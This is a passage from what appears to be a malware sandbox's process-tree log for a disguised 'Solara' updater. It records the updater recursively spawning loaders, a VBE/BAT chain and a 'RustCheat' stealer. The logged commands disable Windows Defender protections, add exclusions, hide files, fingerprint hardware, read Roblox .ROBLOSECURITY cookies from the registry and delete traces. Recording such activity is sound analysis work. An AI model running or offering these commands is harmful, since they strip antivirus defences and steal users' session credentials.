        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        30⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        31⤵
        
        PID:3568
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        32⤵
        
        PID:872
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        29⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        30⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        31⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        31⤵
        Drops file in Drivers directory
        
        PID:820
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:3460
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        32⤵
        Views/modifies file attributes
        
        PID:5308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        
        PID:3204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:6092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:2468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:5052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:5816
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:5468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        
        PID:3380
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:4348
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        32⤵
        
        PID:4664
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        Runs ping.exe
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        30⤵
        Checks computer location settings
        Modifies registry class
        
        PID:1836
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        31⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        32⤵
        
        PID:5856
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        33⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        30⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        31⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        31⤵
        Modifies registry class
        
        PID:1052
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        32⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        33⤵
        
        PID:4164
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        34⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        31⤵
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        32⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        32⤵
        Modifies registry class
        
        PID:5796
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        33⤵
        Checks computer location settings
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        34⤵
        
        PID:5388
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        35⤵
        
        PID:5792
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        32⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        33⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        33⤵
        Modifies registry class
        
        PID:6068
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        34⤵
        Checks computer location settings
        
        PID:5732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        35⤵
        
        PID:3304
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        36⤵
        
        PID:5232
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        33⤵
        
        PID:5776
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        34⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        34⤵
        Modifies registry class
        
        PID:5700
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        35⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        36⤵
        
        PID:3004
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        37⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        34⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        35⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        35⤵
        Modifies registry class
        
        PID:3004
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        36⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        37⤵
        
        PID:1052
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        38⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        35⤵
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        36⤵
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        36⤵
        Modifies registry class
        
        PID:6100
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        37⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        38⤵
        
        PID:3504
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        39⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        36⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        37⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        37⤵
        Modifies registry class
        
        PID:6068
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        38⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        39⤵
        
        PID:5360
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        40⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        37⤵
        Checks computer location settings
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        38⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        38⤵
        Modifies registry class
        
        PID:2184
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        39⤵
        Checks computer location settings
        
        PID:5376
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        40⤵
        
        PID:980
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        41⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        38⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        39⤵
        Checks computer location settings
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        40⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        40⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        39⤵
        Checks computer location settings
        Modifies registry class
        
        PID:5264
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        40⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        41⤵
        
        PID:4428
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        42⤵
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        39⤵
        Checks computer location settings
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        40⤵
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        40⤵
        Modifies registry class
        
        PID:1264
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        41⤵
        
        PID:824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        42⤵
        
        PID:5892
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        43⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        40⤵
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        41⤵
        
        PID:5844
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        41⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4648
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        42⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        43⤵
        
        PID:5276
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        44⤵
        
        PID:5864
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        41⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        42⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        42⤵
        Modifies registry class
        
        PID:5216
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        43⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        44⤵
        
        PID:5592
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        45⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        42⤵
        Checks computer location settings
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        43⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        43⤵
        Checks computer location settings
        Modifies registry class
        
        PID:5240
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        44⤵
        Checks computer location settings
        
        PID:5820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        45⤵
        
        PID:4260
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        46⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        43⤵
        Checks computer location settings
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        44⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        44⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3708
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        45⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        46⤵
        
        PID:5668
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        47⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        44⤵
        Checks computer location settings
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        45⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        45⤵
        Checks computer location settings
        Modifies registry class
        
        PID:5216
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        46⤵
        
        PID:984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        47⤵
        
        PID:3828
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        48⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        45⤵
        Checks computer location settings
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        46⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        46⤵
        Checks computer location settings
        Modifies registry class
        
        PID:6096
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        47⤵
        
        PID:436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        48⤵
        
        PID:5992
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        49⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        46⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        47⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        47⤵
        Modifies registry class
        
        PID:4348
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        48⤵
        Checks computer location settings
        
        PID:1872
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        49⤵
        
        PID:3548
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        50⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        47⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        48⤵
        
        PID:1184
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        49⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        49⤵
        Drops file in Drivers directory
        
        PID:5952
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:868
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        50⤵
        Views/modifies file attributes
        
        PID:4056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        50⤵
        
        PID:4212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:3852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:1768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        50⤵
        
        PID:6072
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        50⤵
        
        PID:2700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:5468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        50⤵
        
        PID:1776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        50⤵
        Detects videocard installed
        
        PID:5964
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        50⤵
        
        PID:6008
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        51⤵
        Runs ping.exe
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        48⤵
        Modifies registry class
        
        PID:980
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        49⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        50⤵
        
        PID:6020
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        51⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        48⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        49⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        49⤵
        Checks computer location settings
        Modifies registry class
        
        PID:5496
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        50⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        51⤵
        
        PID:5280
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        52⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        49⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        50⤵
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        50⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3204
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        51⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        52⤵
        
        PID:5464
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        53⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        50⤵
        Checks computer location settings
        
        PID:1944
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        51⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        51⤵
        Modifies registry class
        
        PID:2568
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        52⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        53⤵
        
        PID:828
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        54⤵
        
        PID:5888
        
